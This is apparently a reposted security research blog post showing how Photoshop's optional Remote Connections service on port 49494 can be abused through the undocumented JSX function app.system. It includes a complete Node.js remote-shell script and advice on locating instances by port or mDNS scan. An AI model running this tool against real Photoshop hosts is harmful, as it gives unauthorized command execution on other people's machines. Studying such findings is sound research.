How to turn Photoshop into a remote access tool

Nytro · July 30, 2017

Security research @ Chaitin Tech

Jul 30

How to turn Photoshop into a remote access tool

Photoshop has an optional feature named Remote Connections. It’s disabled by default, but when you turn this on and set the password, anyone that knows the password can connect to your photoshop service remotely.

Enable remote connections

A common use case for this feature is to preview documents in realtime on remote devices, like an iPad or a phone, to see its actual looking on different screens. You may need some 3rd-party apps like Skala Preview or PS Play on your mobile devices.

Skala Preview, image belongs to Bjango.com

The remote connection is actually running JSX on Photoshop instance.

JSX is the macro for Photoshop (not the one from Facebook). The scripts are written in Javascript, and have the abilities powered by Photoshop, like loading images, tuning colors, drawing vectors and then export. The following manuals shows how to write and run the scripts, and the available APIs.

Adobe provides an open-sourced library generator-core to establish remote connections, so if you are curious about the detail of the protocol you can take a look at it.

When you turn on Remote Connection, Photoshop will listen on port 49494:

$ netstat -an | grep 49494
tcp4 0 0 *.49494 *.* LISTEN

From the source we can see that the password is used for generating key in communications. It uses Triple DES algorithm, fixed iv. The key is generated by pbkdf2 algorithm, with a constant salt “Adobe Photoshop”, and 1000 iterations.

adobe-photoshop/generator-core
generator-core - Core Node.js library for Adobe Photoshop CC's Generator extensibility layergithub.com

The following snippet pops an alert on remote Photoshop:

const core = require("generator-core/lib/generator")
const options = {
    host: '192.168.1.123',
    password: 'password',
    port: 49494
}
const generator = core.createGenerator()
generator.start(options).done(() => {
    generator.evaluateJSXString('alert("Hello")').then(() => generator.shutdown())
})

What makes me excited is that there’s a function that not listed in the reference book: app.system, which executes arbitrary system command. What about making it a web shell?

Then I tried running this in my Photoshop, expecting to pop the output:

alert(app.system("id"))

Unfortunately, the return value is the exit status code, not the contents from stdout. A blind shell sucks.

The solution is easy.

Photoshop’s JSX also provides API for accessing file system. We can redirect the stdout to a temporary file, then read it!

var tmpFile = Folder.temp + 'output.txt';
app.system("id > " + tmpFile);
var stdout = new File(${tmpFile});
stdout.open('r');
stdout.encoding = "UTF-8";
var content = stdout.read();
stdout.close();
stdout.remove();
alert(content);

That’s it!

So my RAT script may look like this:

const readline = require('readline')
const backdoor = require("generator-core/lib/generator")
const options = {
    host: '127.1',
    password: 'password',
    port: 49494
}
console.info('Establishing connection to ' + options.host)
const generator = backdoor.createGenerator()
generator.start(options).done(() => {
    const rl = readline.createInterface({input: process.stdin, output: process.stdout, prompt: '> '})
        .on('line', line => {
            let command = line.trim()
            let tmpFile = `Folder.temp + ${JSON.stringify(Math.random() + '.txt')}`
            let reader = `var stdout = new File(${tmpFile});stdout.open('r');stdout.encoding = "UTF-8";var content = stdout.read();stdout.close();stdout.remove();content`
            generator.evaluateJSXString(`app.system("${command} > " + ${tmpFile});`).then(() => {
                generator.evaluateJSXString(reader).then(output => {
                    console.log(output)
                    rl.prompt()
                })
            })
        })
        .on('SIGINT', () => {
            generator.shutdown()
            rl.close()
        })
    console.log('Remote photoshop shell')
    rl.prompt()
})

result

To discover the nearby controllable Photoshop instances, simply scan TCP port 49494 or use the mDNS protocol to search “_photoshopserver.tcp.”.

This feature is not consider a vulnerability, since you need to know the password. I don’t know if the algorithm is crackable. But if someone asking you to turn the feature on and hand out your password, be careful.

Sursa: https://medium.com/0xcc/how-to-turn-photoshop-into-a-remote-access-tool-972238dc98e9